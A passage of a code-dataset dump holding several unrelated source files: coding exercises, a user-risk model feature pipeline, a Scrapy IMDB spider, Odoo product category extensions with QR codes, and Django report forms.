15],\n# [10, 10, 8] ]\n#\n# output: 5 # less than 5 kWh and the drone would crash before the finish\n# # line. 
More than `5` kWh and it’d end up with excess energy\n\n# GG: this is pretty straightforward once you realize vertical gains and losses will cancel themselves out,\n# only the highest and the starting z will contribute to the battery need\n\ndef calc_drone_min_energy(route):\n    # sanity check\n\n    res = 0\n    min_res = 0\n\n    zs = [z for [x, y, z] in route]\n\n    for i in range(1, len(zs)):\n        delta = zs[i - 1] - zs[i]\n        res += delta\n        if res < 0:\n            min_res = min(min_res, res)\n\n    return -min_res\n\n\nassert calc_drone_min_energy([[0, 2, 10], [3, 5, 0], [9, 20, 6], [10, 12, 15], [10, 10, 8]]) == 5\nassert calc_drone_min_energy([[0, 2, 2], [3, 5, 38], [9, 20, 6], [10, 12, 15], [10, 10, 8]]) == 36\nassert calc_drone_min_energy([[0, 2, 10], [3, 5, 9], [9, 20, 6], [10, 12, 2], [10, 10, 10], [10, 10, 2]]) == 0\n\n\ndef calc_drone_min_energy_ver_2(route):\n    assert len(route) > 1\n\n    # clamp at zero: if the starting point is the highest, no charge is needed up front\n    return max(0, max([z for [_, _, z] in route[1:]]) - route[0][2])\n\n\nassert calc_drone_min_energy_ver_2([[0, 2, 10], [3, 5, 0], [9, 20, 6], [10, 12, 15], [10, 10, 8]]) == 5\nassert calc_drone_min_energy_ver_2([[0, 2, 2], [3, 5, 38], [9, 20, 6], [10, 12, 15], [10, 10, 8]]) == 36\nassert calc_drone_min_energy_ver_2([[0, 2, 10], [3, 5, 9], [9, 20, 6], [10, 12, 2], [10, 10, 10], [10, 10, 2]]) == 0\n","sub_path":"pramp-session/pramp-24/DroneFlightBatteryPlanner.py","file_name":"DroneFlightBatteryPlanner.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"125418544","text":"#!/usr/bin/env python3\n# Challenge Question\n# 1. Create a method that can compare two DNA Sequence records and returns\n#    True if they are the same or False if they are different. Sameness is\n#    based on name, organism, and sequence. All need to be the same for two\n#    objects to be considered the same.\n\nimport sys  # _wrap() below relies on sys.maxsize\n\n\n# private unbound class function\ndef _wrap(linear_sequence, width=None):\n    \"\"\"\n    Input: (Required) A linear sequence string without any existing newline \n           characters.\n           (Optional) An integer `width` argument to specify the maximum\n           line length to wrap the sequence flush to.\n    \n    Returns: A string of the input sequence, but with newline characters\n             at fixed intervals specified by the `width` keyword argument.\n    \"\"\"\n    if width is None:\n        width = sys.maxsize\n    \n    wrapped_sequence = ''\n    linear_sequence_length = len(linear_sequence) # pre-calc it\n    for offset in range(0, linear_sequence_length, width):\n        if offset+width < linear_sequence_length:\n            wrapped_sequence += linear_sequence[offset:(offset+width)] + \"\\n\"\n        else:\n            wrapped_sequence += linear_sequence[offset:linear_sequence_length]\n\n    return wrapped_sequence\n\n# Our Sequence class will inherit generic object methods from the object\n# class\nclass Sequence(object):\n    def __init__(self, name=None, sequence='', organism=None):\n        \"\"\"\n        Class constructor method for Sequence object. In order to create\n        an instance (instantiate) an object from the Sequence class, call:\n        Sequence(sequence_id, sequence_string [,organism=\"Org name\"]).\n        \"\"\"\n        self.name = name\n        self.sequence = sequence\n        self.organism = organism\n\n    def length(self):\n        \"\"\"Calc. the length of the sequence string\"\"\"\n        return len(self.sequence)\n\n    def nt_composition(self, fraction=False):\n        \"\"\"Calc. the nucleotide composition of the sequence. 
The optional\n argument `fraction`, when set to `True` will return the fractional\n nucleotide composition\n \"\"\"\n nt_comp = {'A':0, 'T':0, 'G':0, 'C':0, 'N':0}\n for nt in self.sequence.upper():\n try:\n nt_comp[nt] += 1\n except KeyError:\n raise ValueError(\"Invalid DNA nucleotide character '{}'\".format(nt))\n\n if fraction:\n sequence_length = self.length()\n for nt in nt_comp:\n nt_comp[nt] = float(nt_comp[nt]) / sequence_length\n \n return nt_comp\n \n def gc_content(self):\n gc_chars = set('GCgc')\n gc_count = 0\n for nt in self.sequence:\n if nt in gc_chars:\n gc_count += 1\n\n return float(gc_count) / self.length()\n\n def __str__(self):\n \"\"\"\n This __str__ method allows object specific formatting, allowing us\n to use `str(record)` to return a formatted FASTA record.\n \"\"\"\n return \">{}{}\\n{}\\n\".format(\n self.name,\n '' if self.organism is None else ' [{}]'.format(self.organism),\n _wrap(self.sequence, width=50)\n )\n\n def __eq__(self, other):\n \"\"\"\n This __eq__ method allows us to use object specific comparisons and\n mathematical operators for equivalence, for example:\n \n record1 == record2 # returns True of the records are the same\n \"\"\"\n return self.name == other.name and \\\n self.organism == other.organism and \\\n self.sequence == other.sequence\n \n# If someone (accidentally?) tries to import this script, the following code\n# would get executed, which is not what we want. Writing the following line\n# protects against this because `__name__` will be assigned the module name\n# and not \"__main__\" as it is if this script is executed as a script:\nif __name__ == '__main__':\n # There are two ways we can set the name, organism, and sequence in\n # the Sequence object, we can set them with the Sequence() constructor, \n record1 = Sequence(\n \"U31202.1\",\n \"GAGCTCCGGCGGGTCAGCCGGACTGTCGGCTTCCCGGGGCATCTGGGTCCGGCGGGGCACAGCCCTGGGC\",\n \"Homo sapiens\"\n )\n # or we can set the Sequence object data via its attributes:\n record2 = Sequence()\n record2.name = \"NM_008711.2\"\n record2.sequence = \"AGACAAACCGGTGCCAACGTGCGCGGACGCCGCCGCCGCCACCGCCGCCACCGCCGCTGGAGTCCGCCGG\"\n record2.organism = \"Mus musculus\"\n\n # do a test print:\n print('ID: {}\\nORG: {}\\nLEN: {}\\nGC%: {}\\nSEQ: {}\\n{}'.format(\n record1.name,\n record1.organism,\n record1.length(),\n record1.gc_content() * 100.0,\n record1.sequence,\n str(record1)\n ))\n print()\n print('ID: {}\\nORG: {}\\nLEN: {}\\nGC%: {}\\nSEQ: {}\\n{}'.format(\n record2.name,\n record2.organism,\n record2.length(),\n record2.gc_content() * 100.0,\n record2.sequence,\n str(record2)\n ))\n\n print(\"record1 == record1:\")\n print(record1 == record1)\n print(\"record1 == record2:\")\n print(record1 == record2)\n\n","sub_path":"problemsets/answers/Python_11_JVB_ChallengeQuestion.py","file_name":"Python_11_JVB_ChallengeQuestion.py","file_ext":"py","file_size_in_byte":5100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"339315940","text":"import ah_datadog\nimport ah_db\nimport csv\nimport os\nimport traceback\nfrom modeling.feature.feature_activation import ActivationFeature\nfrom modeling.feature.feature_bank import BankFeature_predict, BankFeature\nfrom modeling.feature.feature_payroll import Payroll\nfrom modeling.feature.feature_device import DeviceFeature\nfrom modeling.feature.feature_user import UserFeature\nfrom modeling.feature.feature_employment import EmploymentFeature\nfrom modeling.feature.feature_cs import CSFeature\nfrom datetime import 
datetime\nfrom modeling.feature.feature_generator import FeatureGenerator\nfrom modeling.feature.feature_timesheet import TimeSheetFeature\nfrom modeling.feature.feature_new import NewFeature\n\n\nimport pickle\nimport pandas as pd\nimport modeling.misc.data_preparation as dp\nimport numpy as np\n\n\nclass NewUserRiskModel:\n def __init__(self):\n self.dummyVar = []\n self.pkl_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"newuser_lr.pkl\")\n\n def createDerivedFeature(self, fg):\n\n self.dummyVar = ['derived_employerid', 'cs_lastAudit1Username',\n 'cs_lastAuditSource', 'cs_lastAuditType',\n 'cs_lastAuditUsername', 'device_lastInstallOS',\n 'payroll_lastPayrollSetupBy',\n 'payroll_paycycleFrequencyId', 'payroll_paytypeid']\n\n fg.f['derived_employerid'] = fg.f['employment_employer']\n\n if fg.f['payroll_hourlyRate'] > 20:\n fg.f['derived_hourlyRateGT20'] = 1\n else:\n fg.f['derived_hourlyRateGT20'] = 0\n\n if fg.f['payroll_lastPayrollStatus'] != 11:\n fg.f['derived_lastPayrollStatus11'] = 0\n else:\n fg.f['derived_lastPayrollStatus11'] = 1\n\n if fg.f['cs_nCredit'] > 0:\n fg.f['derived_hasCSCredit'] = 1\n else:\n fg.f['derived_hasCSCredit'] = 0\n\n if fg.f['employment_nEmployer'] > 5:\n fg.f['derived_nEmployerGT5'] = 1\n else:\n fg.f['derived_nEmployerGT5'] = 0\n\n def getPredTimeTarget(self):\n with ah_db.open_db_connection('sqlserver') as connection:\n sql = '''\n select u.userid, max(predtime) as predtime,sum(IsRestoreFailureAch) as isFail90d, sum(IsLossUpperBound) as isLoss90d,sum(amount) as amount,sum(tipamount) as tipamount,sum(IsLossUpperBound*amount) as totallossamt, max(isFail) as isFail, max(u.isLoss) as isLoss, max(userstatuschangereasonid) as userstatuschangereasonid, max(updatedby) as updatedby, max(originalstatusid) as originalstatusid, max(contributionmargin) as contributionmargin, max(amt_tot) as amt_tot, max(loss_tot) as loss_tot\n from\n (select u.userid,case when MinActivationdate< cast(a.createdon as date) then cast(MinActivationdate as datetime) else a.createdon end as predtime, case when restorefailureamount>0 then 1 else 0 end as isFail, case when restorefailureamount>0 and restorefailureamount>recoveredamount+1 then 1 else 0 end as isLoss,contributionmargin,a.userstatuschangereasonid, a.updatedby,a.originalstatusid,newstatusid,u.amount as amt_tot, u.restorefailureamount-recoveredamount as loss_tot\n from (select userid,userstatuschangereasonid, updatedby,createdon,originalstatusid,newstatusid\n from (select *,rank() over (Partition by userid order by createdon) ranks\n from [Users].[UserStatusHistory]\n where NewStatusId=4 or newstatusid=8) a\n where ranks=1) a\n left join analysis.users u on u.UserID=a.userid\n where u.signupdate>='2016-09-01'\n ) u\n left join analysis.activations ac on u.userid=ac.userid and predtime> dateadd(dd,-90,ac.RequestDate) and iserror=0 and IsCancelled=0 and ac.restoredate 0:\n target = r[0]\n else:\n target = {'userstatuschangereasonid': 'NaN',\n 'updatedby': 'NaN',\n 'originalstatusid': 'NaN'}\n\n f['userstatuschangereasonid'] = target['userstatuschangereasonid']\n f['updatedby'] = target['updatedby']\n f['originalstatusid'] = target['originalstatusid']\n\n def createMaster(self, fout, targets):\n writer = None\n n = 1\n print(\"Start creating master data\")\n print(\"Total number of user %d\" % len(targets))\n for target in targets:\n uid=int(target['userid'])\n if n % 1000 == 0:\n print(n)\n n += 1\n # activation = ActivationFeature(self.conn, uid,scoring=False)\n while True:\n try:\n bank = BankFeature(uid)\n 
payroll = Payroll(uid)\n device = DeviceFeature(uid)\n user = UserFeature(uid)\n employment = EmploymentFeature(uid)\n cs = CSFeature(uid)\n # pip = PIPFeature(self.conn, uid)\n timesheet = TimeSheetFeature(uid)\n new = NewFeature(uid)\n\n predTime = target['predtime']\n break\n except:\n traceback.print_exc()\n\n if predTime > datetime(2016, 9, 1):\n fg = FeatureGenerator(uid, predTime)\n\n self.getMiscFeature(fg.f, target)\n # fg.feature_generator(activation)\n fg.feature_generator(bank)\n fg.feature_generator(payroll)\n fg.feature_generator(device)\n fg.feature_generator(user)\n fg.feature_generator(employment)\n fg.feature_generator(cs)\n # fg.feature_generator(pip)\n fg.feature_generator(timesheet)\n fg.feature_generator(new)\n\n self.createDerivedFeature(fg)\n if writer is None:\n fieldnames = sorted(list(fg.f.keys()))\n writer = csv.DictWriter(fout, fieldnames=fieldnames)\n\n writer.writeheader()\n\n fg.printFeatures(writer)\n\n @ah_datadog.datadog_timed(name=\"getAllFeatures\", tags=[\"operation:newUserRisk\"])\n def getAllFeatures(self, uid):\n # print(\"Start calculating features for %d\"%uid)\n activation = ActivationFeature(uid)\n bank = BankFeature_predict(uid)\n payroll = Payroll(uid)\n device = DeviceFeature(uid)\n user = UserFeature(uid)\n employment = EmploymentFeature(uid)\n cs = CSFeature(uid)\n # pip = PIPFeature(self.conn, uid)\n timesheet = TimeSheetFeature(uid)\n\n new = NewFeature(uid)\n\n predTime = datetime.utcnow() #+timedelta(hours=-4) datetime.now(eastern)\n fg = FeatureGenerator(uid, predTime)\n self.getMiscFeaturePredict(fg.f, uid)\n\n fg.feature_generator(activation)\n fg.feature_generator(payroll)\n fg.feature_generator(device)\n fg.feature_generator(user)\n fg.feature_generator(employment)\n fg.feature_generator(cs)\n fg.feature_generator(bank)\n # fg.feature_generator(pip)\n fg.feature_generator(timesheet)\n fg.feature_generator(new)\n\n self.createDerivedFeature(fg)\n return fg\n\n def __loadModel__(self):\n filename = open('./modeling/model/risk_model/newuser_risk_model'\n '/model/logisticRegression.pkl', 'rb')\n dummy_rules = pickle.load(filename)\n normalizer = pickle.load(filename)\n lr = pickle.load(filename)\n f_columns = pickle.load(filename)\n return dummy_rules, normalizer, lr, f_columns\n\n def getPredictionData(self, features):\n dummy_rules, normalizer, lr, f_columns = self.__loadModel__()\n df = pd.DataFrame(features, index=[0])\n df.replace(['True', 'False'], [1, 0], inplace=True)\n\n cats = ['employment_paytypeid', 'payroll_paycycleFrequencyId',\n 'bank_getInstitutionId',\n 'cs_lastAuditUsername', 'cs_lastAudit1Username', 'user_domain',\n 'payroll_lastPayrollSetupBy', 'device_lastInstallOS',\n 'employment_employer',\n 'actDayOfWeek']\n\n df = dp.dummyCoding(df, cats, dummy_rules)\n\n ##################\n df['derived_transactionAmountTrendDisToOne'] = \\\n np.abs(df['bank_transactionAmountTrend'] - 1)\n\n df['derived_transactionCountTrendDisToOne'] = \\\n np.abs(df['bank_transactionCountTrend'] - 1)\n ###############\n\n X_predict = dp.dataNormalization_Predict(\n df[f_columns],\n normalizer)\n return X_predict, lr\n\n def getReasonCode(self, X_predict, predictor):\n rc = X_predict.values*predictor.coef_\n rc = rc[0]\n\n f_columns = X_predict.columns.tolist()\n reasonCodes = [(x, y) for (y, x) in\n sorted(zip(rc, f_columns), reverse=True)]\n reasonCode = [\"%s:%.2f\" % x for x in reasonCodes[:5]]\n return reasonCode\n\n def getReasonCodeForNegativeOne(self, X_predict):\n reasons = X_predict.isnull().any(axis=0)\n reasonCode = 
reasons[reasons == True].index.tolist()\n return reasonCode\n\n def getScore(self, X_predict, predictor):\n\n y_pred = predictor.predict_proba(X_predict)\n# y_pred = lr.predict_proba(X_predict)\n\n r = y_pred[0, -1]\n\n return r\n\n\ndef prepareTrainingData(uids):\n filepath = './modeling/model/newuser/data/'\n filename = 'master_%d.csv'%os.getpid()\n\n while True:\n try:\n fout = open(filepath+filename, 'w', encoding='utf-8')\n break\n except IOError:\n os.mkdir(filepath)\n\n model = NewUserRiskModel()\n\n # # print (fg.f)\n\n model.createMaster(fout,uids)\n\n fout.close()\n\n\nif __name__ == \"__main__\":\n model = NewUserRiskModel()\n\n \"\"\"\n filepath = './modeling/model/risk_model/newuser_risk_model/data/'\n cmd = 'rm -f ' + filepath + 'master*.csv'\n os.system(cmd)\n conn = connect_db(30)\n model = NewUserRiskModel(conn)\n targets = model.getPredTimeTarget()\n print(len(targets))\n # print(uids[0])\n# prepareTrainingData(targets)\n from numpy import *\n nprocess=8\n targets=[ [targets[i] for i in range(len(targets)) if i%nprocess==x] for x in range(nprocess)]\n for i in targets: print(len(i))\n pool = Pool(processes=nprocess)\n pool.map(prepareTrainingData, targets)\n \"\"\"\n","sub_path":"src/modeling/model/newuser/NewUserRiskModel.py","file_name":"NewUserRiskModel.py","file_ext":"py","file_size_in_byte":11569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"193135790","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom .settings import CONTENTO_RENDERERS\nfrom contento import renderers\nfrom django.utils.module_loading import import_string\n\nclass RenderersMetaView(APIView):\n\n def get_contento_renderers(self):\n\n if CONTENTO_RENDERERS is None:\n RENDERERS = []\n for x in dir(renderers):\n o = getattr(renderers, x);\n try:\n sub = issubclass(o, renderers.base.BaseRenderer)\n except:\n continue\n if sub:\n RENDERERS.append(\"contento.renderers.%s\" % x)\n return RENDERERS\n\n return CONTENTO_RENDERERS or []\n\n def get(self, request, *args, **kwargs):\n rs = self.get_contento_renderers()\n out = {}\n for r in rs:\n klass = import_string(r)\n json_schema = getattr(klass, \"json_schema\")\n if json_schema:\n out[r] = json_schema\n\n return Response(out)\n","sub_path":"contento/api_views.py","file_name":"api_views.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"256713160","text":"import scrapy\nimport uuid\nimport re\nfrom datetime import datetime\n\n\nclass MovieItem(scrapy.Item):\n id = scrapy.Field()\n url = scrapy.Field()\n timestamp_crawl = scrapy.Field()\n title = scrapy.Field()\n release_date = scrapy.Field()\n budget = scrapy.Field()\n gross_usa = scrapy.Field()\n runtime = scrapy.Field()\n\nclass IMDBSpider(scrapy.Spider):\n name = \"title\"\n base_url = 'https://www.imdb.com'\n handle_httpstatus_list = [301] # deal with non / in extracted ending\n download_delay = 1.0\n count = 0\n\n custom_settings = {\n 'FEED_URI': 'title.jl',\n 'FEED_FORMAT': 'jsonlines',\n 'FEED_EXPORTERS': {\n 'json': 'scrapy.exporters.JsonLinesItemExporter',\n },\n 'FEED_EXPORT_ENCODING': 'utf-8',\n }\n\n def start_requests(self):\n urls = [\n 'https://www.imdb.com/search/title/?genres=sci-fi&view=simple&sort=num_votes,desc&explore=title_type,genres',\n # 'https://www.imdb.com/search/title/?genres=sci-fi&view=simple&sort=num_votes,desc&start=3509&explore=title_type,genres&ref_=adv_nxt'\n ]\n for 
url in urls:\n yield scrapy.Request(url=url, callback=self.parse)\n\n def parse_page(self, response):\n item = MovieItem(id=str(uuid.uuid4()), url='', timestamp_crawl='', title='', release_date='', budget='', gross_usa='',\n runtime='')\n item['url'] = response.url\n item['timestamp_crawl'] = datetime.now().isoformat(timespec='minutes')\n item['title'] = response.css('div.title_wrapper h1::text').get().strip()\n texts = response.css('div#titleDetails.article div.txt-block')\n for text in texts:\n t = text.css(\"h4::text\").get()\n if t == 'Release Date:':\n d = \"\".join(text.css(\"div::text\").getall()).strip()\n date_regex = r'([0-9]{0,2} )?[a-zA-z]* [0-9]{4}' # matching example: '19 January 2010' or 'December 2009'\n match = re.match(date_regex, d)\n if match is not None:\n item['release_date'] = d[match.start(): match.end()] if match is not None else ''\n elif t == 'Budget:':\n item['budget'] = \"\".join(text.css(\"div::text\").getall()).strip()\n elif t == 'Gross USA:':\n item['gross_usa'] = \"\".join(text.css(\"div::text\").getall()).strip()\n elif t == 'Runtime:':\n rt = \"\".join(text.css(\"div time::text\").getall()).strip()\n match = re.match(r'[0-9]* min', rt)\n if match is not None:\n item['runtime'] = rt[match.start():match.end()]\n yield item\n\n def parse(self, response):\n self.count += 1\n\n for span in response.css('span.lister-item-header'):\n\n links = span.css('a::attr(href)').getall()\n if len(links) == 2:\n # We should go to episode page instead of the movie page\n yield response.follow(links[1], callback=self.parse_page)\n else:\n yield response.follow(links[0], callback=self.parse_page)\n\n next_page = response.css('div.desc a.lister-page-next::attr(href)').get()\n if next_page is not None and self.count < 100:\n yield response.follow(next_page, callback=self.parse)\n","sub_path":"imdb/imdb/spiders/imdb_scifi_spider.py","file_name":"imdb_scifi_spider.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"165485020","text":"def Cmn(np,nq,nr):\n if np==0 and nr==0 and nr==0:\n return 0\n elif abs(np-nq)>1 or abs(np-nr)>1 or abs(nq-nr)>1:\n return 0\n lista=[np//3,nq//3,nr//3]\n min3=min(lista)\n count=0\n if abs(np-nq)<=1 or abs(np-nr)<=1 or abs(nq-nr)<=1:\n if (np-3*min3)>=0 and (nq-3*min3)>=0 and (nr-3*min3)>=0:\n count+=6*2\n np=np-3*min3\n nq=nq-3*min3\n nr=nr-3*min3\n while not min3:\n if abs(np-nq)<=1 or abs(np-nr)<=1 or abs(nq-nr)<=1:\n count+=2\n return count\nprint(Cmn(2,1,1))","sub_path":"2017-5/znewfile/4232gd.py","file_name":"4232gd.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"433128454","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. 
See LICENSE file for full copyright and licensing details.\nfrom odoo import models,fields,api,exceptions\nfrom odoo.exceptions import ValidationError\nfrom odoo.tools.translate import _\nimport os\nimport qrcode\nfrom PIL import Image\nfrom odoo.modules.module import get_module_resource\nfrom odoo.addons.wx_tools.controllers import client\nimport requests\n\nclass ProductPublicCategory(models.Model):\n    _name = 'product.public.category'\n    _inherit = 'product.public.category'\n\n\n    def _compute_sz_show(self):\n        for s in self:\n            sz_show = False\n            if s.parent_id:\n                company_id = self.env['res.company'].search([('company_code','=','2000')]).id\n                product = self.env['product.template']\n\n                products = product.search([('public_categ_ids','in',s.id)])\n                if products:\n                    for p in products:\n                        for pc in p.pc_show_id:\n                            if pc.company_id.id == company_id and pc.show_ok:\n                                sz_show = True\n                                break\n                        if sz_show:\n                            break\n            else:\n                categs = self.search([('parent_id','=',s.id)])\n                for c in categs:\n                    if c.sz_show == True:\n                        sz_show = True\n                        break\n            s.sz_show = sz_show\n\n    def _compute_bj_show(self):\n\n        for s in self:\n            bj_show = False\n            if s.parent_id:\n                company_id = self.env['res.company'].search([('company_code','=','1000')]).id\n                product = self.env['product.template']\n\n                products = product.search([('public_categ_ids','in',s.id)])\n                if products:\n                    for p in products:\n                        for pc in p.pc_show_id:\n                            if pc.company_id.id == company_id and pc.show_ok:\n                                bj_show = True\n                                break\n                        if bj_show:\n                            break\n            else:\n                categs = self.search([('parent_id','=',s.id)])\n                for c in categs:\n                    if c.bj_show == True:\n                        bj_show = True\n                        break\n            s.bj_show = bj_show\n\n    code = fields.Char('代码')\n    sz_show = fields.Boolean('深圳公司显示',compute=_compute_sz_show)\n    bj_show = fields.Boolean('北京公司显示',compute=_compute_bj_show)\n\n    qrcode = fields.Char(u'二维码')\n    qrcodeimg = fields.Html(compute='_get_qrcodeimg', string=u'二维码')\n\n    def _get_qrcodeimg(self):\n        entry = client.wxenv(self.env)\n        if not self.qrcode:\n            wx_file_path = get_module_resource('wx_tools', 'static/wx')\n            file_name = 'product_category%s.png' % self.id\n            url = entry.server_url + \"/hhjc_shop_product_list_page/%s\" % self.id\n            qr = qrcode.QRCode(\n                version=5,\n                error_correction=qrcode.constants.ERROR_CORRECT_H,\n                box_size=5,\n                border=4,\n            )\n            qr.add_data(url)\n            qr.make(fit=True)\n            # generate the QR code image\n            img = qr.make_image(fill_color=\"#FFFFFF\", back_color=\"#000000\")\n            qrcodeimg_pic = os.path.join(wx_file_path, file_name)\n            with open(qrcodeimg_pic, 'wb') as product_file:\n                img.save(product_file)\n            self.write({'qrcode': file_name})\n            self.qrcodeimg = '' % file_name\n\n        else:\n            self.qrcodeimg = '' % self.qrcode\n\n\n\nclass ProductTemplate(models.Model):\n    _name = 'product.template'\n    _inherit = 'product.template'\n\n    @api.model\n    def create(self, vals):\n        if vals.get('pos_public_categ_ids', False):\n            public_categ_ids = [(6, 0, [vals.get('pos_public_categ_ids')])]\n            vals['public_categ_ids'] = public_categ_ids\n            del vals['pos_public_categ_ids']\n        return super(ProductTemplate, self).create(vals)\n\n    @api.multi\n    def write(self, vals):\n        if vals.get('pos_public_categ_ids', False):\n            public_categ_ids = [(6, 0, [vals.get('pos_public_categ_ids')])]\n            vals['public_categ_ids'] = public_categ_ids\n            del vals['pos_public_categ_ids']\n        return super(ProductTemplate, 
self).write(vals)\n","sub_path":"e2yun_addons/odoo12/e2yun_hhjc_website_sale_extends/models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"210826588","text":"from crispy_forms.helper import FormHelper\nfrom crispy_forms_foundation.layout import (\n ButtonHolder,\n Column,\n Fieldset,\n Layout,\n Row,\n Submit,\n)\nfrom dal import autocomplete\nfrom django import forms\nfrom django.core.exceptions import ValidationError\nfrom django.forms import RadioSelect\n\nfrom . import const\nfrom .models.uczelnia import RaportSlotowUczelnia\n\nfrom bpp.const import PBN_MAX_ROK, PBN_MIN_ROK\nfrom bpp.models import Autor, Uczelnia\nfrom bpp.util import formdefaults_html_after, formdefaults_html_before, year_last_month\n\nOUTPUT_FORMATS = [\n (\"html\", \"wyświetl w przeglądarce\"),\n (\"xlsx\", \"Microsoft Excel (XLSX)\"),\n]\n\nOUTPUT_FORMATS_WITH_PDF = OUTPUT_FORMATS + [\n (\"pdf\", \"Portable Document Format (PDF)\"),\n]\n\n\nclass AutorRaportSlotowForm(forms.Form):\n obiekt = forms.ModelChoiceField(\n label=\"Autor\",\n queryset=Autor.objects.all(),\n widget=autocomplete.ModelSelect2(url=\"bpp:public-autor-autocomplete\"),\n )\n\n od_roku = forms.IntegerField(initial=year_last_month, min_value=2016)\n do_roku = forms.IntegerField(initial=Uczelnia.objects.do_roku_default)\n\n minimalny_pk = forms.IntegerField(label=\"Minimalna wartość PK pracy\", initial=0)\n\n dzialanie = forms.ChoiceField(\n label=\"Wygeneruj\",\n choices=(\n (\n const.DZIALANIE_WSZYSTKO,\n \"prace autora z punktacją dla dyscyplin za dany okres\",\n ),\n (const.DZIALANIE_SLOT, \"zbierz najlepsze prace do zadanej wielkości slotu\"),\n ),\n initial=\"wszystko\",\n widget=forms.RadioSelect,\n )\n\n slot = forms.DecimalField(\n label=\"Zadana wielkość slotu\",\n required=False,\n max_digits=8,\n decimal_places=4,\n max_value=20,\n )\n\n _export = forms.ChoiceField(\n label=\"Format wyjściowy\", choices=OUTPUT_FORMATS_WITH_PDF, required=True\n )\n\n def clean(self):\n if \"od_roku\" in self.cleaned_data and \"do_roku\" in self.cleaned_data:\n if self.cleaned_data[\"od_roku\"] > self.cleaned_data[\"do_roku\"]:\n raise ValidationError(\n {\n \"od_roku\": ValidationError(\n 'Pole musi być większe lub równe jak pole \"Do roku\".',\n code=\"od_do_zle\",\n )\n }\n )\n\n if (\n self.cleaned_data[\"dzialanie\"] == const.DZIALANIE_WSZYSTKO\n and \"slot\" in self.cleaned_data\n and self.cleaned_data[\"slot\"] is not None\n ):\n raise ValidationError(\n {\n \"slot\": ValidationError(\n \"Gdy chcesz wygenerować wszystkie prace tego autora, pozostaw pole 'Slot' puste. \",\n code=\"nie_podawaj_gdy_wszystko\",\n )\n }\n )\n\n if self.cleaned_data[\"dzialanie\"] == const.DZIALANIE_SLOT and (\n \"slot\" not in self.cleaned_data\n or (\"slot\" in self.cleaned_data and self.cleaned_data[\"slot\"] is None)\n or (\n \"slot\" in self.cleaned_data\n and self.cleaned_data[\"slot\"] is not None\n and self.cleaned_data[\"slot\"] <= 0\n )\n ):\n raise ValidationError(\n {\n \"slot\": ValidationError(\n \"Podaj wartość slota do którego chcesz zbierać prace. Wartość musi być większa od zera. 
\",\n code=\"podawaj_gdy_slot\",\n )\n }\n )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.helper = FormHelper()\n self.helper.form_class = \"custom\"\n self.helper.form_action = \".\"\n self.helper.layout = Layout(\n Fieldset(\n \"Wybierz parametry\",\n formdefaults_html_before(self),\n Row(Column(\"obiekt\", css_class=\"large-12 small-12\")),\n Row(Column(\"dzialanie\", css_class=\"large-12 small-12\")),\n Row(Column(\"slot\", css_class=\"large-12 small-12\")),\n Row(\n Column(\"od_roku\", css_class=\"large-6 small-6\"),\n Column(\"do_roku\", css_class=\"large-6 small-6\"),\n ),\n Row(Column(\"minimalny_pk\")),\n Row(Column(\"_export\")),\n formdefaults_html_after(self),\n ),\n ButtonHolder(\n Submit(\n \"submit\",\n \"Pobierz raport\",\n css_id=\"id_submit\",\n css_class=\"submit button\",\n ),\n ),\n )\n\n\nclass UtworzRaportSlotowUczelniaForm(forms.ModelForm):\n class Meta:\n model = RaportSlotowUczelnia\n fields = [\n \"od_roku\",\n \"do_roku\",\n \"akcja\",\n \"slot\",\n \"minimalny_pk\",\n \"dziel_na_jednostki_i_wydzialy\",\n \"pokazuj_zerowych\",\n ]\n\n def __init__(self, *args, **kwargs):\n self.helper = FormHelper()\n self.helper.form_class = \"custom\"\n self.helper.form_action = \".\"\n self.helper.layout = Layout(\n Fieldset(\n \"Wybierz parametry\",\n formdefaults_html_before(self),\n Row(\n Column(\"od_roku\", css_class=\"large-6 small-6\"),\n Column(\"do_roku\", css_class=\"large-6 small-6\"),\n ),\n Row(Column(\"akcja\", css_class=\"large-12 small-12\")),\n Row(Column(\"slot\", css_class=\"large-12 small-12\")),\n Row(Column(\"minimalny_pk\", css_class=\"large-12 small-12\")),\n Row(Column(\"dziel_na_jednostki_i_wydzialy\")),\n Row(Column(\"pokazuj_zerowych\")),\n formdefaults_html_after(self),\n ),\n ButtonHolder(\n Submit(\n \"submit\",\n \"Utwórz raport\",\n css_id=\"id_submit\",\n css_class=\"submit button\",\n ),\n ),\n )\n\n super().__init__(*args, **kwargs)\n\n\nclass ParametryRaportSlotowEwaluacjaForm(forms.Form):\n od_roku = forms.IntegerField(\n initial=Uczelnia.objects.do_roku_default, min_value=PBN_MIN_ROK\n )\n do_roku = forms.IntegerField(\n initial=Uczelnia.objects.do_roku_default,\n min_value=PBN_MIN_ROK,\n max_value=PBN_MAX_ROK,\n )\n\n _export = forms.ChoiceField(\n label=\"Format wyjściowy\",\n choices=OUTPUT_FORMATS,\n required=True,\n widget=RadioSelect,\n initial=\"html\",\n )\n upowaznienie_pbn = forms.NullBooleanField(\n required=False,\n # widget=RadioSelect,\n )\n\n def clean(self):\n if \"od_roku\" in self.cleaned_data and \"do_roku\" in self.cleaned_data:\n if self.cleaned_data[\"od_roku\"] > self.cleaned_data[\"do_roku\"]:\n raise ValidationError(\n {\n \"od_roku\": ValidationError(\n 'Pole musi być większe lub równe jak pole \"Do roku\".',\n code=\"od_do_zle\",\n )\n }\n )\n\n def __init__(self, *args, **kwargs):\n self.helper = FormHelper()\n self.helper.form_class = \"custom\"\n self.helper.form_action = 